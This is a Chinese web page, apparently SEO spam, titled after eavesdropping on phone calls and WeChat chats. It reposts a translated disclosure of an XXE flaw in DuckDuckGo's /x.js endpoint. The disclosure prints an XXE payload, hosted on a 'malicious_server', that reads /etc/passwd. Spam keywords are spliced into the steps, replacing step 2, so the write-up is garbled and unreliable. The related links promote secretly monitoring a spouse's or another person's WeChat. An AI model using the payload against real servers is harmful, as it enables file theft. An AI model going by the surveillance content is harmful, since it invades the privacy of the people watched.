窃听别人手机的通话_窃听别人微信聊天记录

访客3年前关于黑客接单853

窃听别人手机的通话_窃听别人微信聊天记录

近期,白帽汇安全研究院发现hackerone网站披露了DuckDuckGo搜索引擎的一个XXE漏洞。

DuckDuckGo是一个出现于2011年的互联网搜索引擎,其总部位于美国宾夕法尼亚州。和传统搜索引擎(谷歌,必应等)相比,DuckDuckGo着重保护用户的隐私,不监控、不记录用户的搜索内容,还会自动处理用户发出HTTP请求中的敏感信息(如Referer头),尽量减少第三方能获取的信息。

漏洞详情

漏洞发现者在浏览测试https://duckduckgo.com网站时,发现在路径/x.js中的参数?u存在XXE注入。

只要输入一个远程的xm l资源http://malicious_server/xxe.xml,服务器就会解析并执行,并返回一个输出。

而且网站对xm l代码没有任何控制,所以攻击者可以引入一些恶意xm l代码,对服务器进行攻击。

具体步骤如下

1.攻击者在他所控制的服务器中放上一个恶意xml文件,并对公网开放,文件内容如下。

<?xm l version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><creds> <user>&xxe;</user> <pass>mypass</pass></creds>

窃听别人手机的通话_窃听别人微信聊天记录

2.窃听别人手机的通话_窃听别人微信聊天记录

3.返回的页面可以看到xm l文件解析结果

在确认了漏洞后,DuckDuckGo工作人员也对其表示了感谢。

本文由白帽汇整理并翻译,不代表白帽汇任何观点和立场

来源:窃听别人手机的通话_窃听别人微信聊天记录

白帽汇从事信息安全,专注于安全大数据、企业威胁情报。

公司产品:FOFA- *** 空间安全搜索引擎、FOEYE- *** 空间检索系统、NOSEC-安全讯息平台。

为您提供: *** 空间测绘、企业资产收集、企业威胁情报、应急响应服务

标签: 好话题

相关文章

电脑同步微信不被发现

目前有越来越多的人习惯用微信去办公,但是人们比较喜欢的一种办公方式还是用电脑,毕竟在上班时间你不可能一直以来都是用手机去完成吧?当我们手机收到文档的时候就应该同步到电脑微信,那电脑同步微信不被发现怎么...

怎样同时接收老公微信(用自己的手机如何查老公微信)_老公微信

怎样同时接收老公微信(用自己的手机如何查老公微信),当今能够说,人们互相交换的方法越来越高。人们险些能够随时随地经历微信、QQ和其余应用法式接洽同事或亲戚。既然这个APP的操纵方法这么多,咱们有无办理...

用自己手机查老婆和别人聊天,小心陷入陷阱

想要查老婆和别人的微信聊天记录,这些你的注意啊,不要最后老婆和别人的聊天记录没查到,你还不小心的话就陷入了骗子设置好的圈套里面。 用自己手机查老婆和别人聊天 1.前几天,王某找到了一个宣称能够经过...

hacker教你如何同步偷偷关联别人微信而不被发现?

现在有很多社交平台和选择,近年来常用的软件是微信。最近,有多少朋友在微信上同时收到别人的微信?怎么看别人的许多微信,但没有发现,这种行为真的很害怕,苹果的手机、安卓手机、ipad和电脑都有可能,这种微...

刷脸支付_刷脸支付代理/刷脸支付加盟_聚合支付

www.jcku问答加盟网为您提供全国各省市代理刷脸支付的服务商家、还可以找聚合支付或刷脸支付系统开发者的渠道信息。通过xs问答大数据平台为您分析支付宝、微信等刷脸支付的优势和弊端,携手开拓聚合支付/...

腾讯安全预警:KoiMiner木马再活跃 控制者或来自黑客论坛_来了

今年7月,腾讯安全御见威胁情报中心首次监测到KoiMiner木马,利用Apache Struts2的高危漏洞入侵企业服务器进行挖矿;11月,再次发现升级到6.0版本的KoiMiner挖矿木马变种,专...